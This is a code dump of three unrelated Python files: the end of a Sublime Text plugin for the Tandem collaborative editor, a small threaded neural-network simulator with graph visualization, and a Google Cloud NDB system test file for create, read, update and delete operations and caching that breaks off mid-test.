message = m.JoinSession(self._connect_to)
else:
message = m.HostSession()
self._agent.stdin.write(m.serialize(message).encode("utf-8"))
self._agent.stdin.write("\n".encode("utf-8"))
self._agent.stdin.flush()
self._agent_stdout_iter = iter(self._agent.stdout.readline, b"")
self._output_checker.start()
def _shut_down_agent(self):
self._agent.stdin.close()
self._agent.terminate()
self._agent.wait()
def check_buffer(self, buffer_id):
if self._view.buffer_id() != buffer_id:
return
current_buffer = self._current_buffer
if len(current_buffer) != len(self._buffer):
self._send_patches(current_buffer)
else:
for i in range(len(current_buffer)):
if current_buffer[i] != self._buffer[i]:
self._send_patches(current_buffer)
break
self._buffer = current_buffer
def _create_patch(self, start, end, text):
if start is None or end is None or text is None:
# Raise an error if in debug mode, otherwise return None
if DEBUG:
raise ValueError
else:
return None
return [
{
"start": {
"row": start[0],
"column": start[1],
},
"end": {
"row": end[0],
"column": end[1],
},
"text": "",
},
{
"start": {
"row": start[0],
"column": start[1],
},
"end": {
"row": 0,
"column": 0,
},
"text": text,
}
]
def _send_patches(self, current_buffer):
try:
prev_contents = self._buffer
curr_contents = current_buffer
diff_patches = patch.patch_make(prev_contents, curr_contents)
patches = []
length_buffer = [len(x) for x in prev_contents.split(os.linesep)]
for p in diff_patches:
start_index = p.start1
end_index = p.start1 + p.length1
start_index_offset = 0
end_index_offset = 0
while(len(p.diffs)):
(op, data) = p.diffs[0]
if (op != diff_match_patch.DIFF_EQUAL):
break
start_index_offset = start_index_offset + len(data)
p.diffs.pop(0)
while(len(p.diffs)):
(op, data) = p.diffs[-1]
if (op != diff_match_patch.DIFF_EQUAL):
break
end_index_offset = end_index_offset + len(data)
p.diffs.pop()
start_rc = index_to_point(
length_buffer,
start_index + start_index_offset,
)
end_rc = index_to_point(
length_buffer,
end_index - end_index_offset,
)
text = []
for (op, data) in p.diffs:
if op == diff_match_patch.DIFF_INSERT or \
op == diff_match_patch.DIFF_EQUAL:
text.append(data)
text = "".join(text)
text_lengths = [len(word) for word in text.split(os.linesep)]
if start_rc[0] == end_rc[0]:
length_buffer[start_rc[0]] += text_lengths[0]
length_buffer[start_rc[0]] -= end_rc[1] - start_rc[1]
length_buffer[start_rc[0] + 1: start_rc[0] + 1] = \
text_lengths[1:]
else:
if len(text_lengths) > 1:
length_buffer[start_rc[0]] = \
start_rc[1] + text_lengths[0]
length_buffer[end_rc[0]] = length_buffer[end_rc[0]] \
- end_rc[1] + text_lengths[-1]
length_buffer[start_rc[0] + 1: end_rc[0]] = \
text_lengths[1:-1]
else:
length_buffer[start_rc[0]] = \
start_rc[1] + text_lengths[0] \
+ length_buffer[end_rc[0]] - end_rc[1]
length_buffer[start_rc[0] + 1: end_rc[0] + 1] = []
patches.extend(
self._create_patch(start_rc, end_rc, text)
)
patches = [p for p in patches if p is not None]
if len(patches) > 0:
message = m.NewPatches(patches)
self._agent.stdin.write(m.serialize(message).encode("utf-8"))
self._agent.stdin.write("\n".encode("utf-8"))
self._agent.stdin.flush()
except:
error()
if DEBUG:
raise
def _read_message(self):
try:
binary_line = next(self._agent_stdout_iter)
line = binary_line.decode("utf-8")
return m.deserialize(line)
except StopIteration:
return None
def _check_message(self):
while True:
self._text_applied.clear()
message = self._read_message()
if message is None:
break
def callback():
self._handle_message(message)
sublime.set_timeout(callback, 0)
self._text_applied.wait()
def _handle_write_request(self, message):
# Flush out any non-diff'd changes first
self.check_buffer(self._view.buffer_id())
# Allow agent to apply remote operations
ack = m.WriteRequestAck(message.seq)
self._agent.stdin.write(m.serialize(ack).encode("utf-8"))
self._agent.stdin.write("\n".encode("utf-8"))
self._agent.stdin.flush()
try:
# Read, expect, and process an ApplyPatches message
message = self._read_message()
if not isinstance(message, m.ApplyPatches):
raise ValueError("Invalid message. Expected ApplyPatches.")
self._handle_apply_patches(message)
except ValueError as v:
raise v
def _handle_apply_patches(self, message):
for patch in message.patch_list:
start = patch["oldStart"]
end = patch["oldEnd"]
text = patch["newText"]
start_point = self._view.text_point(
start["row"],
start["column"],
)
end_point = self._view.text_point(
end["row"],
end["column"],
)
"""
Edit cannot be passed around
https://forum.sublimetext.com/t/multithreaded-plugin/14439
Use view abstraction instead.
"""
with Edit(self._view) as edit:
edit.replace(
sublime.Region(start_point, end_point),
text,
)
self._buffer = self._current_buffer
def _handle_message(self, message):
global is_processing
is_processing = True
try:
if isinstance(message, m.WriteRequest):
self._handle_write_request(message)
elif isinstance(message, m.ApplyPatches):
raise ValueError("Invalid message. ApplyPatches must be "
"preceeded by a WriteRequest.")
elif isinstance(message, m.SessionInfo):
self._session_id = message.session_id
show_message("Session ID: {}".format(message.session_id), True)
else:
raise ValueError("Unsupported message.")
except ValueError as v:
raise v
finally:
is_processing = False
self._text_applied.set()
def start(self, view, session_id=None, show_gui=False):
global is_active
if is_active:
msg = "Cannot start. An instance is already running on :{}".format(
self._agent_port,
)
show_message(msg, show_gui)
return
self._connect_to = session_id
if self._connect_to is not None:
view = sublime.active_window().new_file()
self._initialize(view)
self._start_agent()
is_active = True
if self._connect_to is None:
self.check_buffer(view.buffer_id())
def stop(self, show_gui):
global is_active
if not is_active:
msg = "No Tandem instance running."
show_message(msg, show_gui)
return
is_active = False
self._shut_down_agent()
if self._output_checker.isAlive():
self._output_checker.join()
msg = "Tandem instance shut down."
show_message(msg, show_gui)
def show_session_id(self, show_gui):
global is_active
if not is_active:
msg = "No Tandem instance running."
show_message(msg, show_gui)
return
if self._session_id is not None:
message = "Session ID: {}".format(self._session_id)
else:
message = "Error: No Session ID assigned."
show_message(message, show_gui)
class TandemTextChangedListener(sublime_plugin.EventListener):
def on_modified(self, view):
global is_active
global is_processing
if not is_active or is_processing:
return
global tandem_agent
tandem_agent.check_buffer(view.buffer_id())
tandem_agent = TandemPlugin()
|
plexus.py | import random
import math
import threading
import time
usleep = lambda x: time.sleep(x/1000000.0)
class Neuron():
def __init__(self, network):
self.network = network
self.subscriptions = {}
self.publications = {}
self.potential = random.uniform(0.0, 1.0)
self.desired_potential = None
self.loss = None
self.type = 0
self.network.neurons.append(self)
self.fire_counter = 0
self.ban_counter = 0
self.position = (None, None)
self.index = None
def partially_subscribe(self):
if len(self.subscriptions) == 0:
sample_length = int(random.normalvariate(
self.network.connectivity,
self.network.connectivity_sqrt
))
if sample_length > len(self.network.nonmotor_neurons):
sample_length = len(self.network.nonmotor_neurons)
if sample_length <= 0:
sample_length = 0
elected = random.sample(
self.network.nonmotor_neurons,
sample_length
)
for neuron in elected:
if id(neuron) != id(self):
self.subscriptions[neuron] = random.uniform(-1.0, 1.0)
neuron.publications[self] = 0
self.network.initiated_neurons += 1
def calculate_potential(self):
total = 0
for neuron, weight in self.subscriptions.items():
total += neuron.potential * weight
return self.activation_function(total)
def activation_function(self, x):
return 1 / (1 + math.exp(-x))
def derivative(self, x):
return x * (1-x)
def calculate_loss(self):
return self.potential - self.desired_potential
def fire(self):
if self.type != 1:
self.potential = self.calculate_potential()
self.network.fire_counter += 1
self.fire_counter += 1
if self.desired_potential is not None:
self.loss = self.calculate_loss()
if self.loss > 0:
alteration_sign = -1
elif self.loss < 0:
alteration_sign = 1
else:
self.desired_potential = None
return True
alteration_value = (abs(self.loss) ** 2)
alteration_value *= (
self.network.decay_factor
** (self.network.fire_counter/1000)
)
for neuron, weight in self.subscriptions.items():
neuron.desired_potential = neuron.potential
neuron.desired_potential += (
alteration_sign * self.derivative(neuron.potential)
)
self.subscriptions[neuron] = weight
self.subscriptions[neuron] += (
alteration_value * alteration_sign
) * self.derivative(neuron.potential)
class Network():
def __init__(
self,
size,
input_dim=0,
output_dim=0,
connectivity=0.01,
precision=2,
randomly_fire=False,
dynamic_output=False,
visualization=False,
decay_factor=1.0
):
self.precision = precision
print("\nPrecision of the network will be {0}".format(
str(1.0 / (10**precision))
))
self.connectivity = int(size * connectivity)
self.connectivity_sqrt = int(math.sqrt(self.connectivity))
print("Each individual non-sensory neuron will subscribe to {0} \
different neurons".format(
str(int(size * connectivity))
))
self.neurons = []
for i in range(size):
Neuron(self)
print("\n")
print(str(size) + " neurons created")
self.sensory_neurons = []
self.input_dim = input_dim
self.pick_sensory_neurons(self.input_dim)
self.motor_neurons = []
self.output_dim = output_dim
self.pick_motor_neurons(self.output_dim)
self.nonsensory_neurons = [x for x in self.neurons if x.type != 1]
self.nonmotor_neurons = [x for x in self.neurons if x.type != 2]
self.interneurons = [x for x in self.neurons if x.type == 0]
self.randomly_fire = randomly_fire
self.motor_randomly_fire_rate = int(math.sqrt(
len(self.nonsensory_neurons) / len(self.motor_neurons)
))
self.dynamic_output = dynamic_output
self.decay_factor = decay_factor
self.initiated_neurons = 0
self.initiate_subscriptions()
self.fire_counter = 0
self.first_queue = {}
self.next_queue = {}
self.output = []
self.wave_counter = 0
print("\n")
self.freezer = False
self.stop = False
self.thread1 = None
self.thread2 = None
self.thread_kill_signal = False
if visualization:
self.visualize()
self.ignite()
print("")
def initiate_subscriptions(self):
print("")
for neuron in self.neurons:
if neuron.type == 1:
continue
neuron.partially_subscribe()
print("Initiated: {0} neurons\r".format(
str(self.initiated_neurons)
), sep=' ', end='', flush=True)
print("\n")
def add_neurons(self, units):
for i in range(units):
Neuron(self)
print("\n")
print(str(units) + " neurons added")
self.initiate_subscriptions()
def _ignite(self):
motor_fire_counter = 0
ban_list = []
while True:
if self.stop:
break
if self.freezer:
usleep(10)
continue
if self.randomly_fire:
neuron = random.sample(self.nonsensory_neurons, 1)[0]
if neuron.type == 2:
if 1 != random.randint(1, self.motor_randomly_fire_rate):
continue
else:
motor_fire_counter += 1
neuron.fire()
if motor_fire_counter >= len(self.motor_neurons):
if self.dynamic_output:
print("Output: {0}\r".format(
str(self.get_output())
), sep=' ', end='', flush=True)
self.output = self.get_output()
self.wave_counter += 1
motor_fire_counter = 0
else:
if not self.next_queue:
for neuron in self.motor_neurons:
neuron.fire()
for neuron in ban_list:
neuron.ban_counter = 0
ban_list = []
self.output = self.get_output()
self.wave_counter += 1
if self.dynamic_output:
print("Output: {0}\r".format(
str(self.output)
), sep=' ', end='', flush=True)
if not self.first_queue:
for neuron in self.sensory_neurons:
self.first_queue.update(neuron.publications)
self.next_queue = self.first_queue.copy()
current_queue = self.next_queue.copy()
self.next_queue = {}
for neuron in ban_list:
if neuron.ban_counter > self.connectivity_sqrt:
current_queue.pop(neuron, None)
while current_queue:
neuron = random.choice(list(current_queue.keys()))
current_queue.pop(neuron, None)
if neuron.ban_counter <= self.connectivity_sqrt:
if neuron.type == 2:
continue
neuron.fire()
ban_list.append(neuron)
neuron.ban_counter += 1
self.next_queue.update(neuron.publications)
time.sleep(0.001)
def ignite(self):
self.freezer = False
self.stop = False
if not self.thread1:
self.thread1 = threading.Thread(target=self._ignite)
self.thread1.start()
print("Network has been ignited")
def freeze(self):
self.freezer = True
self.stop = True
self.thread1 = None
self.thread2 = None
self.thread_kill_signal = True
print("Network is now frozen")
def breakit(self):
for neuron in self.neurons:
neuron.subscriptions = {}
print("All the subscriptions are now broken")
def pick_sensory_neurons(self, input_dim):
available_neurons = []
for neuron in self.neurons:
if neuron.type == 0:
available_neurons.append(neuron)
for neuron in random.sample(available_neurons, input_dim):
neuron.type = 1
self.sensory_neurons.append(neuron)
print(str(input_dim) + " neuron picked as sensory neuron")
def pick_motor_neurons(self, output_dim):
available_neurons = []
for neuron in self.neurons:
if neuron.type == 0:
available_neurons.append(neuron)
for neuron in random.sample(available_neurons, output_dim):
neuron.type = 2
self.motor_neurons.append(neuron)
print(str(output_dim) + " neuron picked as motor neuron")
def load(self, input_arr, output_arr=None):
if len(self.sensory_neurons) != len(input_arr):
print("Size of the input array: {0}".format(str(len(input_arr))))
print("Number of the sensory neurons: {0}".format(
str(len(self.sensory_neurons))
))
print("Size of the input array and number of the sensory \
neurons are not matching! Please try again")
else:
step = 0
for neuron in self.sensory_neurons:
neuron.potential = input_arr[step]
step += 1
if output_arr is None:
step = 0
self.freezer = True
for neuron in self.nonsensory_neurons:
neuron.desired_potential = None
step += 1
self.freezer = False
else:
if len(self.motor_neurons) != len(output_arr):
print("Size of the output/target array: {0}".format(
str(len(output_arr))
))
print("Number of the motor neurons: {0}".format(
str(len(self.motor_neurons))
))
print("Size of the output/target array and number of the\
motor neurons are not matching! Please try again")
else:
step = 0
for neuron in self.motor_neurons:
neuron.desired_potential = output_arr[step]
step += 1
def get_output(self):
output = []
for neuron in self.motor_neurons:
output.append(round(
neuron.potential,
self.precision
))
return output
def visualize(self):
self.thread2 = threading.Thread(target=self._visualize)
self.thread2.start()
print("Visualization initiated")
def _visualize(self):
import pyqtgraph as pg
import numpy as np
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
w = pg.GraphicsWindow()
w.setWindowTitle('Visualization of the Network')
v = w.addViewBox()
v.setAspectLocked()
g = pg.GraphItem()
v.addItem(g)
positions = []
symbols = []
symbol_brushes = []
x = 0
y = 0
x += 1
for neuron in self.sensory_neurons:
y += 1
neuron.position = (x, y)
positions.append(neuron.position)
symbols.append('t')
symbol_brushes.append((250, 194, 5))
neuron.index = len(positions) - 1
x += len(self.sensory_neurons)
y = (len(self.sensory_neurons) - len(self.interneurons)) / 2
for neuron in self.interneurons:
y += 1
neuron.position = (
random.uniform(
x - len(self.sensory_neurons)/1.5,
x + len(self.sensory_neurons)/1.5
),
y
)
positions.append(neuron.position)
symbols.append('h')
symbol_brushes.append((195, 46, 212))
neuron.index = len(positions) - 1
x += len(self.sensory_neurons)
y = (len(self.sensory_neurons) - len(self.motor_neurons)) / 2
for neuron in self.motor_neurons:
y += 1
neuron.position = (x, y)
positions.append(neuron.position)
symbols.append('s')
symbol_brushes.append((19, 234, 201))
neuron.index = len(positions) - 1
while True:
connections = []
lines = []
for neuron2 in self.neurons:
for neuron1, weight in neuron2.subscriptions.items():
connections.append((neuron1.index, neuron2.index))
lines.append((55, 55, 55, ((weight+1)/2)*255, (weight+1)))
positions = np.asarray(positions)
connections = np.asarray(connections)
lines = np.asarray(lines, dtype=[
('red', np.ubyte),
('green', np.ubyte),
('blue', np.ubyte),
('alpha', np.ubyte),
('width', float)
])
g.setData(
pos=positions,
adj=connections,
pen=lines,
size=0.1,
symbolBrush=symbol_brushes,
symbol=symbols,
pxMode=False
) # Update the graph
pg.QtGui.QApplication.processEvents()
if self.thread_kill_signal:
break
time.sleep(0.0333)
|
test_crud.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for Create, Update, Delete. (CRUD)
"""
import datetime
import os
import pickle
import pytz
import random
import threading
import zlib
try:
from unittest import mock
except ImportError:
import mock
import pytest
import test_utils.system
from google.cloud import ndb
from google.cloud.ndb import _cache
from google.cloud.ndb import global_cache as global_cache_module
from . import KIND, eventually, equals
USE_REDIS_CACHE = bool(os.environ.get("REDIS_CACHE_URL"))
USE_MEMCACHE = bool(os.environ.get("MEMCACHED_HOSTS"))
def _assert_contemporaneous(timestamp1, timestamp2, delta_margin=2):
delta_margin = datetime.timedelta(seconds=delta_margin)
assert delta_margin > abs(timestamp1 - timestamp2)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
def test_retrieve_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
assert key.get() is entity
def test_retrieve_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
cache_value = global_cache.get([cache_key])[0]
assert cache_value
assert not _cache.is_locked_value(cache_value)
patch = mock.patch(
"google.cloud.ndb._datastore_api._LookupBatch.add",
mock.Mock(side_effect=Exception("Shouldn't call this")),
)
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_retrieve_entity_with_redis_cache(ds_entity, redis_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
cache_value = redis_context.global_cache.redis.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
patch = mock.patch(
"google.cloud.ndb._datastore_api._LookupBatch.add",
mock.Mock(side_effect=Exception("Shouldn't call this")),
)
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_MEMCACHE, reason="Memcache is not configured")
def test_retrieve_entity_with_memcache(ds_entity, memcache_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
cache_key = global_cache_module.MemcacheCache._key(cache_key)
cache_value = memcache_context.global_cache.client.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
patch = mock.patch(
"google.cloud.ndb._datastore_api._LookupBatch.add",
mock.Mock(side_effect=Exception("Shouldn't call this")),
)
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_not_found(ds_entity):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_nested_tasklet(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
@ndb.tasklet
def get_foo(key):
entity = yield key.get_async()
raise ndb.Return(entity.foo)
key = ndb.Key(KIND, entity_id)
assert get_foo(key).result() == 42
@pytest.mark.usefixtures("client_context")
def test_retrieve_two_entities_in_parallel(ds_entity):
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
@ndb.tasklet
def get_two_entities():
entity1, entity2 = yield key1.get_async(), key2.get_async()
raise ndb.Return(entity1, entity2)
entity1, entity2 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entities_in_parallel_nested(ds_entity):
"""Regression test for #357.
https://github.com/googleapis/python-ndb/issues/357
"""
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
entity3_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity3_id, foo=66, bar="route")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
key3 = ndb.Key(KIND, entity3_id)
@ndb.tasklet
def get_two_entities():
entity1, (entity2, entity3) = yield (
key1.get_async(),
[key2.get_async(), key3.get_async()],
)
raise ndb.Return(entity1, entity2, entity3)
entity1, entity2, entity3 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
assert isinstance(entity3, SomeKind)
assert entity3.foo == 66
assert entity3.bar == "route"
@pytest.mark.usefixtures("client_context")
def test_insert_entity(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
# Make sure strings are stored as strings in datastore
ds_entity = ds_client.get(key._key)
assert ds_entity["bar"] == "none"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_stored_name_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
bar = ndb.StringProperty(name="notbar")
entity = SomeKind(foo="something", bar="or other")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "something"
assert retrieved.bar == "or other"
ds_entity = ds_client.get(key._key)
assert ds_entity["notbar"] == "or other"
@pytest.mark.usefixtures("client_context")
def test_insert_roundtrip_naive_datetime(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty()
entity = SomeKind(foo=datetime.datetime(2010, 5, 12, 2, 42))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 2, 42)
@pytest.mark.usefixtures("client_context")
def test_datetime_w_tzinfo(dispose_of, ds_client):
class timezone(datetime.tzinfo):
def __init__(self, offset):
self.offset = datetime.timedelta(hours=offset)
def utcoffset(self, dt):
return self.offset
def dst(self, dt):
return datetime.timedelta(0)
mytz = timezone(-4)
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(tzinfo=mytz)
bar = ndb.DateTimeProperty(tzinfo=mytz)
entity = SomeKind(
foo=datetime.datetime(2010, 5, 12, 2, 42, tzinfo=timezone(-5)),
bar=datetime.datetime(2010, 5, 12, 2, 42),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 3, 42, tzinfo=mytz)
assert retrieved.bar == datetime.datetime(2010, 5, 11, 22, 42, tzinfo=mytz)
def test_parallel_threads(dispose_of, namespace):
client = ndb.Client(namespace=namespace)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def insert(foo):
with client.context(cache_policy=False):
entity = SomeKind(foo=foo, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == "none"
thread1 = threading.Thread(target=insert, args=[42], name="one")
thread2 = threading.Thread(target=insert, args=[144], name="two")
thread1.start()
thread2.start()
thread1.join()
thread2.join()
@pytest.mark.usefixtures("client_context")
def test_large_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty(compressed=True)
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_blob_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.BlobProperty(compressed=True)
foo = b"abc" * 100
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_repeated_local_structured_property(dispose_of, ds_client):
class Dog(ndb.Model):
name = ndb.StringProperty()
class House(ndb.Model):
dogs = ndb.LocalStructuredProperty(Dog, repeated=True, compressed=True)
entity = House()
dogs = [Dog(name="Mika"), Dog(name="Mocha")]
entity.dogs = dogs
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.dogs == dogs
def test_get_by_id_with_compressed_repeated_local_structured_property(
client_context, dispose_of, ds_client
):
class Dog(ndb.Model):
name = ndb.TextProperty()
class House(ndb.Model):
dogs = ndb.LocalStructuredProperty(Dog, repeated=True, compressed=True)
with client_context.new(legacy_data=True).use():
entity = House()
dogs = [Dog(name="Mika"), Dog(name="Mocha")]
entity.dogs = dogs
key = entity.put()
house_id = key.id()
dispose_of(key._key)
retrieved = House.get_by_id(house_id)
assert retrieved.dogs == dogs
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_compressed_property(
ds_entity_with_meanings,
):
class SomeKind(ndb.Model):
blob = ndb.BlobProperty()
value = b"abc" * 1000
compressed_value = zlib.compress(value)
entity_id = test_utils.system.unique_resource_id()
ds_entity_with_meanings(
{"blob": (22, compressed_value)}, KIND, entity_id, **{"blob": compressed_value}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.blob == value
@pytest.mark.usefixtures("client_context")
def test_large_pickle_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.PickleProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_key_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty()
key_value = ndb.Key("Whatevs", 123)
entity = SomeKind(foo=key_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == key_value
@pytest.mark.usefixtures("client_context")
def test_multiple_key_properties(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty(kind="Whatevs")
bar = ndb.KeyProperty(kind="Whatevs")
foo = ndb.Key("Whatevs", 123)
bar = ndb.Key("Whatevs", 321)
entity = SomeKind(foo=foo, bar=bar)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == bar
assert retrieved.foo != retrieved.bar
def test_insert_entity_with_caching(client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
with client_context.new(cache_policy=False).use():
# Sneaky. Delete entity out from under cache so we know we're getting
# cached copy.
key.delete()
eventually(key.get, equals(None))
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
def test_insert_entity_with_global_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
cache_value = global_cache.get([cache_key])[0]
assert not cache_value
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
cache_value = global_cache.get([cache_key])[0]
assert cache_value
assert not _cache.is_locked_value(cache_value)
entity.foo = 43
entity.put()
cache_value = global_cache.get([cache_key])[0]
assert not cache_value
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_insert_entity_with_redis_cache(dispose_of, redis_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
cache_value = redis_context.global_cache.redis.get(cache_key)
assert not cache_value
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
cache_value = redis_context.global_cache.redis.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
entity.foo = 43
entity.put()
cache_value = redis_context.global_cache.redis.get(cache_key)
assert not cache_value
@pytest.mark.skipif(not USE_MEMCACHE, reason="Memcache is not configured")
def test_insert_entity_with_memcache(dispose_of, memcache_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
